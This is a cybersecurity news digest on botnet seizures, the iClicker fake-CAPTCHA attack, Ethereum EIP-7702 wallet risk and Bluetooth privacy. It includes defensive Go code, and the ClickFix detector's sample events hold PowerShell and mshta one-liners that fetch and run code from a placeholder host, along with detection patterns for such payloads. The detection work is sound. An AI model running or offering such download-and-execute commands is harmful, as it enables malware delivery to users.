US feds seize two top botnet sites in Operation Moonlander

Florida encryption backdoor bill fails, Suspect in ransomware attack on Dutch research institute detained, College website iClicker was compromised, Google to pay Texas $1.4b for privacy violations, Wikimedia challenges UK Online Safety Act, Ledger Discord server was hacked, so much more

Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.

If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!

The US Justice Department said it seized two powerful botnet sites, Anyproxy.net and 5socks.net, in an operation called “Moonlander.”

Three Russian nationals, 37-year-old Alexey Viktorovich Chertkov, 41-year-old Kirill Vladimirovich Morozov, and 36-year-old Aleksandr Aleksandrovich Shishkin, were charged with conspiracy and damage to protected computers for running botnet services offered through Anyproxy and 5socks. Kazakhstani national Dmitriy Rubtsov, 38, was hit with the same charges.

The four created the botnets by infecting older-model wireless internet routers in the U.S. and abroad. A malware campaign allowed the men to reconfigure the routers and sell them as proxy servers through the Anyproxy and 5socks sites. 

The 5socks.net website offered more than 7,000 proxies for sale and allowed users to pay monthly fees of up to $110 for access. 

The Justice Department said a Virginia company managed the website domains and that the four men allegedly earned about $46 million through the infected routers over a 20-year stretch. 

The notice coincides with an alert released by the FBI on Wednesday, warning people that end-of-life routers no longer supported by the companies that made them were the primary target of the administrators behind Anyproxy and 5socks.  (Jonathan Greig / The Record)

Related: Justice Department, Security Week, IT Pro, Security Affairs, The Cyber Express, Infosecurity Magazine, TechCrunch

A Florida bill, Social Media Use by Minors, which would have required social media companies to provide an encryption backdoor for allowing police to access user accounts and private messages, failed to pass.

The bill was “indefinitely postponed” and “withdrawn from consideration” in the Florida House of Representatives earlier this week. Lawmakers in the Florida Senate had already voted to advance the legislation, but a bill requires both legislative chambers to pass it before it can become law.

The bill would have required social media firms to “provide a mechanism to decrypt end-to-end encryption when law enforcement obtains a subpoena.” Subpoenas are typically issued by law enforcement agencies themselves, without judicial oversight, so the bill would have compelled decryption without a judge ever reviewing the request.

Digital rights group the Electronic Frontier Foundation called the bill “dangerous and dumb.” Security professionals have long argued that it is impossible to create a secure backdoor that cannot also be maliciously abused, and encryption backdoors put user data at risk of data breaches. (Zack Whittaker / TechCrunch)

Related: Cyber Daily, Edmond Thorne

Police in the Republic of Moldova detained a 45-year-old man wanted internationally for serious cybercrime, following a joint operation conducted by Moldovan officers and authorities of the Kingdom of the Netherlands.

The arrest was made following an international cooperation operation carried out by the Center for Combating Cybercrime and the Criminal Investigation Division of the National Investigation Inspectorate, PCCOCS prosecutors, and Dutch law enforcement agencies. The suspect was temporarily on Moldovan territory.

The man is suspected of organizing several cyberattacks on companies in the Netherlands, including a “ransomware” attack on the Netherlands Organization for Scientific Research, which resulted in an estimated damage of €4.5 million. In addition to cyberattacks, he is also suspected of blackmail and money laundering.

On May 6, the Moldovan authorities searched his home and car and seized relevant evidence, including €84,800 (around $94,000) in cash, an electronic wallet, electronic devices, and bank cards. (IPN.md)

Related: Politie.nl

iClicker, a Macmillan subsidiary whose classroom-response platform is used by 5,000 instructors and 7 million students at colleges and universities across the United States, including the University of Michigan, the University of Florida, and universities in California, had its website compromised to serve visitors a fake CAPTCHA.

According to the University of Michigan's Safe Computing team, the iClicker site was hacked between April 12 and April 16, 2025, to display a fake CAPTCHA that instructed users to press "I'm not a robot" to verify themselves.

However, when visitors clicked on the verification prompt, a PowerShell script was silently copied into the Windows clipboard in what is known as a "ClickFix" social engineering attack.

The CAPTCHA would then instruct users to open the Windows Run dialog (Win + R), paste the PowerShell script (Ctrl + V), and execute it by pressing Enter to verify themselves.
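The Run-dialog step above is also what gives defenders a hunting signal: a command pasted into Win+R is spawned as a child of explorer.exe, and the Run dialog records what was typed under the RunMRU registry key. The Go program below is an added example, not code from the Bleeping Computer article or from iClicker. It scores process-creation records by parent process, interpreter and download-and-execute tokens, and decodes RunMRU values for the forensic side. The events and registry values it scans are constructed in the shape of Sysmon Event ID 1 fields (not real telemetry), and the example.invalid URLs are placeholders.

```go
// Hunting for ClickFix-style execution. Added example; events are constructed.
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// ProcEvent mirrors the three Sysmon Event ID 1 fields the check needs.
type ProcEvent struct {
	Image, ParentImage, CommandLine string
}

// Interpreters reachable from the Run dialog without opening a shell first.
var runDialogLOLBins = map[string]bool{
	"powershell.exe": true, "pwsh.exe": true, "mshta.exe": true,
	"cmd.exe": true, "curl.exe": true, "wscript.exe": true,
}

// Tokens typical of one-line download-and-execute payloads.
var suspiciousTokens = []*regexp.Regexp{
	regexp.MustCompile(`(?i)-w(indowstyle)?\s+hidden`),
	regexp.MustCompile(`(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}`),
	regexp.MustCompile(`(?i)\biex\b|invoke-expression`),
	regexp.MustCompile(`(?i)\biwr\b|invoke-webrequest|downloadstring|downloadfile`),
	regexp.MustCompile(`(?i)https?://`),
	regexp.MustCompile(`(?i)\bmshta\b`),
}

func baseName(p string) string {
	if i := strings.LastIndex(p, `\`); i >= 0 {
		return strings.ToLower(p[i+1:])
	}
	return strings.ToLower(p)
}

// ScoreEvent counts suspicious tokens, but only for LOLBins whose parent is
// explorer.exe: Run-dialog launches are children of explorer.exe.
func ScoreEvent(e ProcEvent) int {
	if baseName(e.ParentImage) != "explorer.exe" || !runDialogLOLBins[baseName(e.Image)] {
		return 0
	}
	n := 0
	for _, re := range suspiciousTokens {
		if re.MatchString(e.CommandLine) {
			n++
		}
	}
	return n
}

// DetectClickFix returns the events scoring at or above threshold.
func DetectClickFix(events []ProcEvent, threshold int) []ProcEvent {
	var hits []ProcEvent
	for _, e := range events {
		if ScoreEvent(e) >= threshold {
			hits = append(hits, e)
		}
	}
	return hits
}

// ParseRunMRU strips the trailing `\1` from RunMRU values and orders them by
// MRUList (most recent first). The key lives at
// HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
func ParseRunMRU(values map[string]string) []string {
	var cmds []string
	for _, k := range values["MRUList"] {
		if v, ok := values[string(k)]; ok {
			cmds = append(cmds, strings.TrimSuffix(v, `\1`))
		}
	}
	return cmds
}

// SampleEvents are constructed, not captured from a real host.
var SampleEvents = []ProcEvent{
	{`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `C:\Windows\explorer.exe`,
		`powershell -w hidden -c "iex (iwr https://example.invalid/verify).Content"`},
	{`C:\Windows\System32\mshta.exe`, `C:\Windows\explorer.exe`,
		`mshta https://example.invalid/captcha.hta`},
	{`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `C:\Windows\explorer.exe`,
		`powershell`}, // a user simply opening a shell
	{`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `C:\Windows\System32\svchost.exe`,
		`powershell -w hidden -File C:\scripts\backup.ps1`}, // scheduled task, not the Run dialog
}

func main() {
	for _, e := range DetectClickFix(SampleEvents, 2) {
		fmt.Printf("score %d: %s\n", ScoreEvent(e), e.CommandLine)
	}
}
```

The parent-process gate matters more than the token list: hidden windows and encoded commands are common in legitimate automation, but a LOLBin spawned directly by explorer.exe with a URL in its command line is rarely anything but a user pasting what a page told them to.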

iClicker said, "We recently resolved an incident affecting the iClicker landing page (iClicker.com). Importantly, no iClicker data, apps, or operations were impacted, and the identified vulnerability on the iClicker landing page has been resolved." (Lawrence Abrams / Bleeping Computer)

Related: iClicker, University of Michigan

Example of a fake CAPTCHA in a ClickFix attack. Source: SilentPush.

Google agreed to pay $1.4 billion to the State of Texas to settle two lawsuits accusing it of violating the privacy of state residents by tracking their locations and searches and collecting their facial recognition information.

Google’s settlement is the tech giant's latest legal setback. Over the past two years, Google has lost a string of antitrust cases after being found to have a monopoly over its app store, search engine, and advertising technology. It has spent the past three weeks in the search case trying to fend off a U.S. government request to break up its business.

José Castañeda, a Google spokesman, said the company had already changed its product policies. “This settles a raft of old claims, many of which have already been resolved elsewhere,” he said. (Tripp Mickle / New York Times)

Related: Attorney General of Texas, CNBC, The Guardian, NPR, Newsweek, The Texas Tribune, The Washington Post, The Verge

Wikimedia Foundation’s Lead Counsel Phil Bradley-Schmieg announced that the Foundation, the non-profit that hosts Wikipedia, is challenging the lawfulness of the UK’s Online Safety Act (OSA)’s Categorisation Regulations.

The Online Safety Act, which became law in October 2023, imposes stringent duties on social media platforms, search engines, messaging services, gaming and dating apps, and pornography and file-sharing sites, with penalties for failing to remove illegal content.

“We are arguing that they place Wikipedia and its users at unacceptable risk of being subjected to the OSA’s toughest ‘Category 1’ duties, which were originally designed to target some of the UK’s riskiest websites,” wrote Bradley-Schmieg, on behalf of the Wikimedia Foundation.

The Wikimedia Foundation said it shares the UK government’s commitment to promoting online environments where everyone can safely participate.

But it said that if enforced on Wikipedia, Category 1 duties would undermine the privacy and safety of Wikipedia volunteer users, expose the encyclopedia to manipulation and vandalism, and divert essential resources from protecting and improving Wikipedia and the other Wikimedia Projects. (Tom Jowitt / Silicon UK)

Related: Wikimedia, Engadget, Gigazine

Hardware wallet provider Ledger has confirmed its Discord server is secure again after an attacker compromised a moderator’s account on May 11 to post scam links that tricked users into revealing their seed phrases on a third-party website.

“One of our contracted moderators had their account compromised, which allowed a malicious bot to post scam links in one channel,” Ledger team member Quintin Boatwright wrote on the Ledger Discord server.

Some members in Ledger’s Discord channel claimed the attacker abused moderator privileges to ban and mute them as they tried to report the breach, possibly slowing Ledger’s reaction.

Boatwright said the security breach was an isolated incident. Ledger has taken additional measures to strengthen its security on Discord, a chat platform many crypto projects use to share protocol developments and engage with their community. 

Using the compromised Ledger community manager account, the hacker told Ledger Discord members that there was a recently discovered vulnerability in the firm’s security systems and strongly urged all users to verify their recovery phrases with a scam link, according to several screenshots shared on X. (Brayden Lindrea / Cointelegraph)

Related: Crypto Briefing, The Block, Mitrade, iHodl, Coinpedia

Screenshot of the scam message posted in Ledger's Discord. Source: ecurrencyholder (X).

Ethereum’s latest network upgrade, Pectra, introduced powerful new features to improve scalability and smart account functionality while opening a dangerous new attack vector that could allow hackers to drain funds from user wallets using only an off-chain signature.

Under the Pectra upgrade, which went live on May 7 at epoch 364032, an attacker who obtains a single off-chain signature can use the new transaction type to take control of an externally owned account (EOA); the victim never signs an on-chain transaction.

Arda Usman, a Solidity smart contract auditor, said that “it becomes possible for an attacker to drain an EOA’s funds using only an off-chain signed message (no direct on-chain transaction signed by the user).”

At the center of the risk is Ethereum Improvement Proposal (EIP)-7702, a core component of the Pectra upgrade. It introduces the SetCode transaction (type 0x04), which lets an EOA delegate execution to a contract simply by signing an authorization message; because the authorization is signed off-chain, it can be included in a type 0x04 transaction submitted by anyone, including the attacker.

If an attacker obtains this signature, they can overwrite the wallet’s code with a small proxy that forwards calls to their malicious contract.

Wallets and interfaces that fail to detect or properly represent these new transaction types are most at risk. Another researcher quoted in the piece, Rudytsia, warned that “wallets are vulnerable if they do not analyze Ethereum’s transaction types,” especially transaction type 0x04.

He emphasized that wallet engines must clearly display delegation requests and flag suspicious addresses. (Amin Haqshanas / Cointelegraph)
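The checks Rudytsia calls for can be made concrete. The Go program below is an added example, not code from the article, Consensys or any wallet: it identifies a type 0x04 envelope by its first byte (the EIP-2718 typed-transaction prefix), decodes the 0xef0100 delegation designator that eth_getCode returns for a delegated EOA, and reviews an authorization tuple before the user signs it, flagging chain_id 0 (valid on every chain), a chain mismatch, revocation to address(0), and a delegation target the wallet does not recognise. The delegate allowlist, the addresses and the raw envelope bytes are constructed.

```go
// Wallet-side EIP-7702 checks. Added example; addresses and allowlist are constructed.
package main

import (
	"bytes"
	"encoding/hex"
	"fmt"
	"strings"
)

// EIP-2718 typed-transaction envelope: the first byte is the type.
var txTypes = map[byte]string{
	0x01: "EIP-2930 access list",
	0x02: "EIP-1559 dynamic fee",
	0x03: "EIP-4844 blob",
	0x04: "EIP-7702 set code",
}

// ClassifyTx names the envelope type; legacy RLP transactions start at 0xc0 or above.
func ClassifyTx(raw []byte) string {
	if len(raw) == 0 {
		return "empty"
	}
	if raw[0] >= 0xc0 {
		return "legacy"
	}
	if name, ok := txTypes[raw[0]]; ok {
		return name
	}
	return fmt.Sprintf("unknown type 0x%02x", raw[0])
}

// delegationPrefix is the EIP-7702 delegation designator: an EOA whose code is
// 0xef0100 || addr executes addr's code for every call it receives.
var delegationPrefix = []byte{0xef, 0x01, 0x00}

// DelegatedTo returns the delegation target encoded in an account's code, or
// "" when the code is not a delegation designator.
func DelegatedTo(code []byte) string {
	if len(code) != 23 || !bytes.HasPrefix(code, delegationPrefix) {
		return ""
	}
	return "0x" + hex.EncodeToString(code[3:])
}

// Authorization is one authorization_list entry before its signature fields.
// The authority signs keccak256(0x05 || rlp([chain_id, address, nonce])).
type Authorization struct {
	ChainID uint64
	Address string
	Nonce   uint64
}

const zeroAddress = "0x0000000000000000000000000000000000000000"

// ReviewAuthorization lists what a wallet should surface before signing.
// An empty result means a known delegate on the connected chain.
func ReviewAuthorization(a Authorization, walletChainID uint64, knownTargets map[string]string) []string {
	var warn []string
	addr := strings.ToLower(a.Address)
	switch {
	case a.ChainID == 0:
		warn = append(warn, "chain_id 0: this authorization is valid on every chain")
	case a.ChainID != walletChainID:
		warn = append(warn, fmt.Sprintf("chain_id %d does not match the connected chain %d", a.ChainID, walletChainID))
	}
	if addr == zeroAddress {
		return append(warn, "delegation to address(0) clears the current delegation")
	}
	if _, ok := knownTargets[addr]; !ok {
		warn = append(warn, "delegation target "+a.Address+" is not a known delegate contract")
	}
	return warn
}

func main() {
	// Constructed envelope: only the type byte matters for classification.
	fmt.Println(ClassifyTx([]byte{0x04, 0xf8, 0x00}))
	target := "0x" + strings.Repeat("ab", 20) // constructed delegate address
	code, _ := hex.DecodeString("ef0100" + strings.Repeat("ab", 20))
	fmt.Println("delegated to:", DelegatedTo(code))
	known := map[string]string{target: "hypothetical ExampleDelegate"} // constructed allowlist
	req := Authorization{ChainID: 0, Address: "0x" + strings.Repeat("cd", 20)}
	for _, w := range ReviewAuthorization(req, 1, known) {
		fmt.Println("warning:", w)
	}
}
```

A wallet that runs DelegatedTo on the result of eth_getCode for the user's own address can also tell the user, after the fact, that their account is now delegated and to where; that is the state an attacker leaves behind once the signature has been used.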

Related: Consensys

23andMe, the genetic testing giant once valued in the billions, is now navigating Chapter 11 bankruptcy and notifying millions of current and former customers that they may be eligible to file claims as part of the restructuring process.

The company and 11 of its subsidiaries, including Lemonaid Health and LPRXOne, filed for bankruptcy protection in the Eastern District of Missouri on March 23 of this year.

Customers were alerted Sunday that they have until July 14 to file a Cyber Security Incident Claim for losses incurred as a result of the company's 2023 data breach.

Those who suffered financial or other damages due to the breach can submit a claim as part of the bankruptcy case. Customers with different types of grievances unrelated to the cyberattack, such as issues with DNA test results or the company’s telehealth services, may submit a separate claim under the General Bar Date Package. (Connie Loizos / TechCrunch)

Related: Kroll, US Bankruptcy Court

Researchers at IAS Threat Labs report that a new ad fraud scheme, dubbed Kaleidoscope, is targeting millions of Android users by converting regular apps into profit-generating platforms for cybercriminals.

The scam affects over 2.5 million devices monthly, with India alone accounting for 20%.

The threat has spread to Brazil, Indonesia, and the Philippines through unofficial app stores and direct download links from social media and messaging platforms.

Google has removed flagged apps and promised to protect users against known versions of this scam. However, the problem persists due to lax standards among ad resellers and the decentralized nature of unofficial Android marketplaces.

This has led to a discreet but lucrative scam that prioritizes ad revenue over user experience, thus undermining trust in Android's app ecosystem. (Akash Pandey / NewsBytes)

Related: IAS Threat Lab, PhoneArena

Source: IAS Threat Lab.

Microsoft is working on adding a new Teams feature that will prevent users from capturing screenshots of sensitive information shared during meetings.

Those joining from unsupported platforms will be automatically placed in audio-only mode to protect shared content. The company plans to start rolling out this new Teams feature to Android, desktop, iOS, and web users worldwide in July 2025.

"To address the issue of unauthorized screen captures during meetings, the Prevent Screen Capture feature ensures that if a user attempts to take a screen capture, the meeting window will turn black, thereby protecting sensitive information," Microsoft shared in a new Microsoft 365 roadmap entry.

"This feature will be available on Teams desktop applications (both Windows and Mac) and Teams mobile applications (both iOS and Android)."

However, even with screenshots blocked, sensitive media and information shared in Teams meetings can still be captured by pointing a phone camera at the screen.

Microsoft has yet to share whether the feature will be enabled by default or can be toggled on and off by meeting organizers or admins. (Sergiu Gatlan / Bleeping Computer)

Related: Microsoft, TechRadar, WebProNews, GBHackers, Heise Online

In time for International Anti-Ransomware Day, Kaspersky researchers warn that custom AI tools and RaaS platforms are fueling the next wave of ransomware attacks.

In a new report, they detail how AI is fueling the rapid development of global ransomware attacks and warn that the proliferation of tailored LLMs is poised to significantly amplify cybercriminals' reach and impact.

Among the most prolific threat actors observed using AI is the FunkSec group, which emerged in late 2024 and quickly gained notoriety by surpassing more established actors like Cl0p and RansomHub, claiming eighty-five victims in December alone.

Among other observations, Kaspersky highlights how LLMs marketed on the dark web have lowered the technical barrier to creating malicious code, phishing campaigns, and social engineering attacks, with threat actors able to craft highly convincing lures or automate ransomware deployment. (Tom Quinn / Digit)

Related: Securelist, IT Wire, Cyber Daily

Most active ransomware groups in 2024. Source: Kaspersky.

One feature highlighted in the Bluetooth SIG's new Core Specification 6.1 is improved device privacy through randomized Resolvable Private Address (RPA) updates.

A Resolvable Private Address (RPA) is a Bluetooth address that looks random to an observer: it combines a 24-bit random value with a 24-bit hash computed from that value and a secret identity resolving key (IRK). It is used in place of a device's fixed identity address to protect user privacy, and it lets peers that hold the IRK (previously bonded devices) recognise and reconnect to the device without it revealing its true identity.

Currently, RPAs are updated at fixed intervals, usually every 15 minutes, which introduces predictability: an observer who sees one address disappear and a new one appear on that schedule can link the two. This predictability can be exploited in correlation attacks, making long-term tracking possible.

Bluetooth 6.1 improves privacy by randomly distributing the RPA updates between 8 and 15 minutes (the default) and allowing custom values between 1 second and 1 hour. (Bill Toulas / Bleeping Computer)
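To make the mechanism concrete, the Go program below generates and resolves RPAs the way the Bluetooth Core Specification defines them (the ah random-address hash in Vol 3, Part H: AES-128 of the 24-bit prand right-aligned in a zero block, keeping the low 24 bits of the ciphertext), and picks the next rotation delay uniformly from the 8-to-15-minute window that 6.1 makes the default. It is an added example, not Bluetooth SIG code; the IRK values are constructed test keys, and addresses are held most-significant byte first, as they are printed rather than as they are sent on air.

```go
// RPA generation, resolution and randomized rotation. Added example; keys are constructed.
package main

import (
	"crypto/aes"
	"crypto/rand"
	"fmt"
	"math/big"
	"time"
)

// Address holds a 48-bit Bluetooth address most-significant byte first, i.e.
// as printed "AA:BB:CC:DD:EE:FF". For an RPA the top 24 bits are prand and the
// low 24 bits are hash = ah(IRK, prand).
type Address [6]byte

// ah is the random-address hash: AES-128 of prand right-aligned in a zero
// block, keeping the low 24 bits of the ciphertext.
func ah(irk [16]byte, prand [3]byte) [3]byte {
	c, err := aes.NewCipher(irk[:])
	if err != nil {
		panic(err)
	}
	var in, out [16]byte
	copy(in[13:], prand[:]) // r' = padding || r
	c.Encrypt(out[:], in[:])
	var h [3]byte
	copy(h[:], out[13:]) // e(k, r') mod 2^24
	return h
}

// NewRPA forms an address from an IRK and a 24-bit prand, forcing the two most
// significant bits to 0b01, which marks the address as resolvable.
func NewRPA(irk [16]byte, prand [3]byte) Address {
	prand[0] = prand[0]&0x3f | 0x40
	h := ah(irk, prand)
	var a Address
	copy(a[:3], prand[:])
	copy(a[3:], h[:])
	return a
}

// RandomRPA is what a device does at each rotation: fresh prand, same IRK.
func RandomRPA(irk [16]byte) Address {
	var prand [3]byte
	if _, err := rand.Read(prand[:]); err != nil {
		panic(err)
	}
	return NewRPA(irk, prand)
}

// IsRPA checks the 0b01 marker in the two most significant bits.
func IsRPA(a Address) bool { return a[0]&0xc0 == 0x40 }

// Resolve returns the index of the IRK (from a bonded peer) that produced a,
// or -1. Without the IRK an observer cannot link two RPAs from one device.
func Resolve(a Address, irks [][16]byte) int {
	if !IsRPA(a) {
		return -1
	}
	var prand, hash [3]byte
	copy(prand[:], a[:3])
	copy(hash[:], a[3:])
	for i, k := range irks {
		if ah(k, prand) == hash {
			return i
		}
	}
	return -1
}

// RotationDelay picks the next RPA timeout uniformly in [lo, hi]. Bluetooth
// 6.1 defaults to 8..15 minutes instead of a fixed 15-minute timer, so an
// observer can no longer match an old and a new address by their timing.
func RotationDelay(lo, hi time.Duration) time.Duration {
	n, err := rand.Int(rand.Reader, big.NewInt(int64(hi-lo)+1))
	if err != nil {
		panic(err)
	}
	return lo + time.Duration(n.Int64())
}

func (a Address) String() string {
	return fmt.Sprintf("%02X:%02X:%02X:%02X:%02X:%02X", a[0], a[1], a[2], a[3], a[4], a[5])
}

func main() {
	irk := [16]byte{0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x00} // constructed
	a := RandomRPA(irk)
	fmt.Println(a, "resolves to IRK index", Resolve(a, [][16]byte{irk}),
		"next rotation in", RotationDelay(8*time.Minute, 15*time.Minute))
}
```

Resolve is the check a bonded peer performs on every advertisement it sees; an attacker without the IRK is left with only the rotation timing, which is exactly what RotationDelay randomizes.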

Related: Bluetooth, Help Net Security, GBHackers, Android Authority, Techlusive

Best Thing of the Day: Who Knew That Bugs Could Be Beautiful

Computer scientist blinry has launched the Glitch Gallery, a museum of accidental art made up of pretty software bugs.

Bonus Best Thing of the Day: Hollywood's Early Hacking Films Are Younger Than Most Millennials

It's the 30th anniversary of two iconic hacker films, The Net and Hackers, which were prescient in predicting life online.

Worst Thing of the Day: Tyler Durden Predicted This

Silicon Valley tech lords have taken to martial arts to punch, kick, knee, elbow, and sometimes hammer an opponent over the head with their fists.

Closing Thought
